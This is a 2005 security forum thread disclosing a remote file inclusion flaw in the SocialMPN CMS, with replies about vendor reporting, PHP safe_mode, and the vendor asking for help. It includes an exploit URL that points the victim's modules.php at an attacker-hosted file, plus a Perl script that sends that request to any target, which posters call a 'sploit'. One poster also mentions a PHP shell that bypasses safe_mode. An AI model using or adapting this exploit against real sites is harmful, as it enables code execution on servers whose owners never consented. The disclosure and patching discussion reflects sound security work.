|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SocialMPN |
|
Posted: Sun Mar 06, 2005 6:45 pm |
|
|
zer0-c00l |
Advanced user |
|
|
Joined: Jun 25, 2004 |
Posts: 72 |
Location: BRAZIL! |
|
|
|
|
|
|
# SocialMPN Remote File Inclusion
# 06/03/2005
# discovered by zer0-c00l (irc.BRASnet.org at #NMAP)
# or email (lucaszero [at] gmail [dot] com)
# Versions of SocialMPN affected: All versions.
# SocialMPN oficial site: www.socialmpn.com (Its vulnerable too)
# PS.: A lot of sites (maybe all sites) has SafeMode in PHP.
Real Life Exploit:
http://[victim]/modules.php?name=[attacker evil file]&file=article&sid=2 |
|
|
|
|
Posted: Mon Mar 07, 2005 4:08 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
Nice job
have you post a confirmation to the vendor ? |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
Remote Testing SocialMPN |
|
Posted: Mon Mar 07, 2005 5:34 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
as soon as possible ive made an simple script for testing the site, i post it to bugtraq too
Code: |
#!/usr/bin/perl -w
# Remote Testing SocialMPN Remote File Inclusion by y3dips [for testing only]
# Bug find by zer0-c00l , published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html
print " * Remote Testing File Inclusion for SocialMPN by y3dips *\n";
use LWP;
use LWP::UserAgent;
if(@ARGV == 2)
{
$target= $ARGV[0];
$xploit= $ARGV[1];
my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;
$url = "http://$target/modules.php?name=$xploit&file=article&sid=2";
my $injek = $ua->get($url);
print " -------------------------------\n";
if ($injek->is_success)
{
$injekcek = $injek->as_string;
if ($injekcek =~ /(HTTP\/1\.0 200 OK)/)
{
print("\n This Site Maybe Vulnerable \n");
}
else
{
die $injek->status_line;
}
print " --------------------------------\n";
}
}
else{
print "Gunakan: perl $0 [target] [xplo.txt] \n";
}
#EOF y3dips(c)2005
|
hope it helps
[/code] |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Tue Mar 08, 2005 8:41 am |
|
|
zrontho |
Beginner |
|
|
Joined: Mar 01, 2005 |
Posts: 3 |
Location: German |
|
|
|
|
|
|
y3dips wrote: | as soon as possible ive made an simple script for testing the site, i post it to bugtraq too. hope its help |
thanks a million for the sploit, but i still don't understand about the sentence Gunakan in
Code: | print "Gunakan: perl $0 [target] [xplo.txt] \n"; |
so, can you translate its to english or germany, 'cause i only understood english and germany |
|
|
|
|
Posted: Tue Mar 08, 2005 5:49 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
i report all holes and vendor fix all bugs |
|
|
|
|
Posted: Wed Mar 09, 2005 4:40 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
zrontho wrote: | y3dips wrote: | as soon as possible ive made an simple script for testing the site, i post it to bugtraq too. hope its help |
thanks a million for the sploit, but i still don't understand about the sentence Gunakan in
Code: | print "Gunakan: perl $0 [target] [xplo.txt] \n"; |
so, can you translate its to english or germany, 'cause i only understood english and germany |
sorry ,
Gunakan in english : Use
im in love with my country , so i forget to change the word . LOL |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Wed Mar 09, 2005 5:25 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
LINUX wrote: | i report all holes and vendor fix all bugs |
nice responses uve done there
eventhough many sites has set safemode 'ON' but there still many usefull thing could inform attacker about the sites
for example : phpinfo() |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Wed Mar 09, 2005 10:16 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
y3dips wrote: | LINUX wrote: | i report all holes and vendor fix all bugs |
nice responses uve done there
eventhough many sites has set safemode 'ON' but there still many usefull thing could inform attacker about the sites
for example : phpinfo() |
safemode not is protection, i have shell in php bypass safemode.
i discover multiple XSS in socialsmpn and report to developers and i test all smpn systems all fixed |
|
|
|
|
|
|
|
|
Posted: Fri Mar 11, 2005 1:31 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
LINUX wrote: |
safemode not is protection, i have shell in php bypass safemode.
i discover multiple XSS in socialsmpn and report to developers and i test all smpn systems all fixed |
oh,
i tought safemode 'on' will increase the security because ( CMIIW )
as i know By enabling safe_mode parameter, PHP scripts are able to access files only when their owner is the owner of the PHP scripts. This is one of the most " important security " mechanisms built into the PHP. Effectively counteracts unauthorized attempts to access system files (e.g. /etc/paswd) and adds many restrictions that make unauthorized access more difficult.<taken from " Securing PHP: Step-by-step
by Artur Maj" > |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Sat Mar 12, 2005 6:57 am |
|
|
zrontho |
Beginner |
|
|
Joined: Mar 01, 2005 |
Posts: 3 |
Location: German |
|
|
|
|
|
|
y3dips wrote: | sorry ,
Gunakan in english : Use
im in love with my country , so i forget to change the word . LOL |
thanks dude for the cool reply !!!
keep fighting !!!! |
|
|
|
|
Posted: Mon Jun 13, 2005 3:49 pm |
|
|
MrCl3an |
Beginner |
|
|
Joined: Jun 13, 2005 |
Posts: 1 |
|
|
|
|
|
|
|
I appreciate the notification I recevied back in March about our system's vulnerabilities regarding remote file inclusion.
However I request some help in finding a new remote file inclusion problem that has been brought to my attention. I have been told that I have 7 days to resolve this bug (not sure sure what will happen in 7 days, but I am expecting an exploit) and I thought I had resolved this issue back in March completely, but apperently not.
Any help in finding what problem is there would be very helpful. I can work with whomever wants to help to make our system more secure.
Thank you again for your time. |
|
|
|
|
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|